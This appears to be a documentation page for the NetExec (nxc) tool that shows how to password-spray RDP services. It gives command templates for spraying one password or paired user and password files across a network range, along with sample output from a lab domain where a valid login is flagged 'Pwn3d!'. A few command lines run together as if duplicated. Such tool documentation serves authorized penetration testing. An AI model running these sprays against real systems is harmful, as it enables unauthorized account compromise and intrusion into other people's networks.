Password spraying
Password spraying
nxc rdp <CIDR> -u <USERNAME> -p <PASSWORD>
nxc rdp <TARGET> -u rubeus -p October2021nxc rdp <TARGET> -u ron -p October2021
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:October2021
$ nxc rdp <TARGET> -u rubeus -p October2021
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!)
Password spraying (without bruteforce)
nxc rdp <CIDR> -u userfile -p <PASSWORD>file --no-bruteforce
Expected Results:
nxc rdp <TARGET> -u <USERFILE> -p <PASSWORD>file --no-bruteforcenxc rdp <TARGET> -u <USERFILE> -p <PASSWORD>file --no-bruteforce
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:toto
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\demo:tata
RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!
Info
By default, nxc will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list.